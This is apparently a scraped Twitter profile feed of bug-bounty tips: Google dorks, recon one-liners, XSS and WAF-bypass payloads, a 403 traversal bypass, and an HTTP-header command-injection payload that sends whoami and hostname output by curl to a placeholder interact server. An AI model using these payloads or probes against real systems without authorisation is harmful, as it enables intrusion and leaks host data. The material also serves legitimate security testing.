RootMoksha Labs (@rootmoksha) 's Twitter Profile
RootMoksha Labs

@rootmoksha

Cybersecurity focussed Bitcoin venture studio

ID: 1721857998941761536

calendar_today07-11-2023 11:51:59

1,1K Tweet

7,7K Followers

1 Following

RootMoksha Labs (@rootmoksha) 's Twitter Profile Photo

Google Dork Hunt for XSS, SQLi, API vulnerabilities & hidden endpoints python dork[.]py -d "site:*target filetype:php" Credit: Gudetama #bugbountytips #BugBounty

Google Dork

Hunt for XSS, SQLi, API vulnerabilities & hidden endpoints

python dork[.]py -d "site:*target filetype:php"

Credit: <a href="/gudetama_bf/">Gudetama</a>

#bugbountytips #BugBounty
RootMoksha Labs (@rootmoksha) 's Twitter Profile Photo

Nuclei Template : REFLECTION Potential XSS, SSRF, Cache Poisoning, Open URL Redirection & OAUTH Redirection nuclei -t reflection[.]yaml -u target Credit: Gudetama #BugBounty #bugbountytips

Nuclei Template : REFLECTION

Potential XSS, SSRF, Cache Poisoning, Open URL Redirection &amp; OAUTH Redirection

nuclei -t reflection[.]yaml -u target

Credit: <a href="/gudetama_bf/">Gudetama</a> 

#BugBounty #bugbountytips
RootMoksha Labs (@rootmoksha) 's Twitter Profile Photo

Subdomain Takeover Detection with Subfinder & Nuclei -new wordpress takeover detection for nuclei template subfinder -d target -o target && nuclei -t wp-xyz-takeover[.]yaml -l target github.com/schooldropout1… Credits: X #BugBounty #bugbountytips

Subdomain Takeover Detection  with Subfinder &amp; Nuclei 

-new wordpress takeover detection for nuclei template

subfinder -d target -o target &amp;&amp; nuclei -t wp-xyz-takeover[.]yaml -l target

github.com/schooldropout1…

Credits: <a href="/TheMsterDoctor1/">X</a> 

#BugBounty #bugbountytips
RootMoksha Labs (@rootmoksha) 's Twitter Profile Photo

Google Dorks - Code Leaks site:pastebin. com "example. com" site:jsfiddle. net "example. com" site:codebeautify. org "example. com" site:codepen. io "example. com" Credits: Mike Takahashi #BugBounty #bugbountytips

Google Dorks - Code Leaks 

site:pastebin. com "example. com"
site:jsfiddle. net "example. com"
site:codebeautify. org "example. com"
site:codepen. io "example. com"

Credits: <a href="/TakSec/">Mike Takahashi</a> 

#BugBounty #bugbountytips
RootMoksha Labs (@rootmoksha) 's Twitter Profile Photo

Add the file `yahoo_site_admin/credentials/db.conf` to your wordlist, and you might discover some juicy data. Credits:Karim Habeeb #BugBounty #bugbountytips

RootMoksha Labs (@rootmoksha) 's Twitter Profile Photo

RCE - Can we still use this in HTTP Header? ` ' ; $ > curl${IFS}$(whoami)-$(hostname)-$(hostname${IFS}-i)[.]your-interact-server By:Gudetama #bugbountytips #BugBounty

RootMoksha Labs (@rootmoksha) 's Twitter Profile Photo

an XSS payload to bypass some waf & filters in Firefox <input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;"> Credits:Md Ismail Šojal 🕷️ #bugbounty #bugbountytips

an XSS payload to bypass some waf &amp; filters in Firefox

&lt;input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;"&gt;

Credits:<a href="/0x0SojalSec/">Md Ismail Šojal 🕷️</a> 

#bugbounty #bugbountytips
RootMoksha Labs (@rootmoksha) 's Twitter Profile Photo

If you come across a Windows IIS server, definitely scan the shortname and try to obtain the files by fuzzing, this may allow you to find vulnerabilities like 'CVE-2024-39677: NHibernate SQL Injection Vulnerability ' By:Yunus Emre Öztaş #BugBounty #bugbountytips

If you come across a Windows IIS server, definitely scan the shortname and try to obtain the files by fuzzing, this may allow you to find vulnerabilities like 'CVE-2024-39677: NHibernate SQL Injection Vulnerability '

By:<a href="/ynsmroztas/">Yunus Emre Öztaş</a>

#BugBounty #bugbountytips
RootMoksha Labs (@rootmoksha) 's Twitter Profile Photo

Subdomain Enumeration Using Web Archive This Bash function extracts subdomains from Web Archive results! Add it to your ~/.bashrc: function wayback() { curl -sk "web.archive.org/cdx/search/cdx…" | awk -F/ '{gsub(/:.*/, "", $3); print $3}' | sort -u } By: Spix0r #BugBountyTips

RootMoksha Labs (@rootmoksha) 's Twitter Profile Photo

"HTML Sanitizer Bypass Cloudflare leads to XSS"🛠️ payload: '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/ #bugbountytips by Md Ismail Šojal 🕷️ #BugBounty

"HTML Sanitizer Bypass Cloudflare leads to XSS"🛠️

payload: '&lt;00 foo="&lt;a%20href="javascript:alert('XSS-Bypass')"&gt;XSS-CLick&lt;/00&gt;--%20/

#bugbountytips by <a href="/0x0SojalSec/">Md Ismail Šojal 🕷️</a> 
#BugBounty
RootMoksha Labs (@rootmoksha) 's Twitter Profile Photo

Do wayback on root domain then get endpoints and add it to your list and fuzz on subdomains or other roots.. $ ~ waybackurls root.com |cut -d "/" -f 4-|sort -u > endpoints.txt #bugbountytips by Ali #BugBounty

Do wayback on root domain then get endpoints and add it to your list and fuzz on subdomains or other roots..

$ ~ waybackurls root.com  |cut -d "/" -f 4-|sort -u &gt; endpoints.txt

#bugbountytips by <a href="/111xNagashy/">Ali</a> 
#BugBounty
RootMoksha Labs (@rootmoksha) 's Twitter Profile Photo

Use Uncover for recon purposes uncover -q http.title:"GitLab" -silent | httpx -silent | nuclei uncover -q target -f ip | naabu echo jira | uncover -e shodan,censys -silent #bugbountytips by:infosecresearcher #BugBounty

RootMoksha Labs (@rootmoksha) 's Twitter Profile Photo

403 bypass methodology ! 1- using space symbols exmaple: /admin -> 403 /admin%09 -> 200 /admin%20 -> 200 2- use traversal Example: /admin -> 403 /..;/admin -> 200 you can fuzz with traversal sometimes that's end with results Example: /..;/FUZZ #bugbountytips by VIEH Group

403 bypass methodology !

1- using space symbols
exmaple:
/admin -&gt; 403
/admin%09 -&gt; 200
/admin%20 -&gt; 200

2- use traversal
Example:
/admin -&gt; 403
/..;/admin -&gt; 200

you can fuzz with traversal sometimes that's end with results

Example: /..;/FUZZ

#bugbountytips by <a href="/viehgroup/">VIEH Group</a>